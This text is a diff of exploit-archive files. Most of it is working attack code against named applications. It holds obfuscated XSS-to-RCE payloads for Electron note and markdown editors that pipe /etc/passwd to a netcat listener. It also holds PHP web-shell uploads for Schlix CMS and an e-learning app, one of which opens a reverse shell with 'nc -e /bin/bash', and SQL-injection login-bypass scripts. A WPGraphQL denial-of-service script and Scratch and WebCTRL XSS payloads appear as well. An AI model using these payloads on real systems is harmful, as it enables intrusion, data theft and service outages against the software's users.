4,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

27
exploits/multiple/webapps/49833.js Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://freeter.io/
# Version: 1.2.1
# Tested on: Windows, Linux, MacOs
# Software Description:
It is an organizer for design, it allows you to work on as many projects as you want. with project drop-down menu facilities to switch between them easily.
integrates widgets to set up a dashboard, giving you quick access to everything you need to work on a project.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as custom widget titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/iBuKWm4
# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

26
exploits/multiple/webapps/49834.js Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/dvcrn/markright
# Version: 1.0
# Tested on: Linux, MacOs,Windows
# Software Description:
A minimalist discount editor with github flavor, it allows to view, edit and load files with markdown extension (.md) quickly and with a friendly interface.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/VOsgKbZ
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

25
exploits/multiple/webapps/49835.js Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify
# Version: 1.2.0
# Tested on: Windows, Linux, MacOs
# Software Description:
It is a lightweight editor for viewing and editing the markdown documentation of aYou can browse your personal folder to view and edit your files, change view / edit mode in md file with subject at the top.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof
https://imgur.com/a/T4jBoiS
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

33
exploits/multiple/webapps/49836.js Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/AnotherNote/anote
# Version: 1.0
# Tested on: Linux, MacOs
# Software Description:
A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images
export PDF support tray menu quick note (evernote inspired)
cmd + v default will convert html.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/mFMDOuu
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
{"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)"}
{"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}}
{"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}

79
exploits/multiple/webapps/49897.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
# Date: 21.05.2021
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: 2.2.6-6
# Tested On: Ubuntu 20.04 (Firefox)
############################################################################################################
Summary: An authorized user can upload a file with a .phar extension
to a path of his choice and control the content as he wishes. This causes RCE vulnerability.
For full technical details and source code analysis:
https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.
############################################################################################################
PoC:
1-) Login to admin panel with true credentials and go to "Tools ->
Mediamanager" menu from left side.
2-) Click the "Upload File" and upload a file and catch the request with Burp.
3-) Change the "uploadstartpath", "filename" and file content as follows.
# Request
POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
Host: vulnerable-server
Content-Length: 846
X-Schlix-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
Accept: */*
Origin: http:// <http://10.211.55.4/>vulnerable-server
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
<http://10.211.55.4/schlix/admin/app/core.mediamanager>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
schlix-your-cookie;__atuvc=5%7C20;
schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2;
schlix_frontendedit_control_showdoc=-2
Connection: close
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="_csrftoken"
{your_csrf_token}
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="uploadstartpath"
/media/docs/....//....//....//....//system/images/avatars/large/
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"
<?PHP system($_GET['rce']);?>
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__total_file_size"
0
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__max_file_count"
20
------WebKitFormBoundarybllOFLruz1WAs7K2--
4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".

39
exploits/multiple/webapps/50079.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

42
exploits/multiple/webapps/50463.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
# Date: 4/07/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
# Version: 6.5 and Below
# CVE : CVE-2021-31682
--Summary--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized.
Automated Logic
https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
--Affects--
- WebCTRL OEM
- Versions 6.5 and prior
--Details--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:
- Hijacking a user's session
- Using XSS payloads to capture input (keylogging)
-- Proof of Concept --
The following URL parameter was impacted and can be exploited with the sample payload provided below:
- https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script>
--Mitigation--
Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
--Timeline--
- 4/07/2021: XSS Vulnerability was discovered and documented.
- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.

55
exploits/php/dos/49807.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
# Author: Dolev Farhi
# Date: 2021-04-12
# Vendor Homepage: https://www.wpgraphql.com/
# Version: 1.3.5
# Tested on: Ubuntu
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())

93
exploits/php/webapps/49434.py Executable file
View file

@ -0,0 +1,93 @@
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution
#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.
import requests
print('########################################################')
print('## E-LEARNING SYSTEM 1.0 ##')
print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##')
print('########################################################')
print('Author - Himanshu Shukla & Saurav Shukla')
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if("You login as Administrator." in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
#Creating a PHP Web Shell
phpshell = {
'file':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/x-php',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)
shell_upload = True if("window.location='index.php'" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
print("[*]Please Input Reverse Shell Details")
LHOST=input("[*]LHOST : ")
LPORT=input("[*]LPORT : ")
print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')
#Executing The Webshell
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)
exit()

58
exploits/php/webapps/49462.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('** LIBRARY SYSTEM 1.0 **')
print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
print('********************************************************')
print('Author - Himanshu Shukla')
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)

19
exploits/php/webapps/49574.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
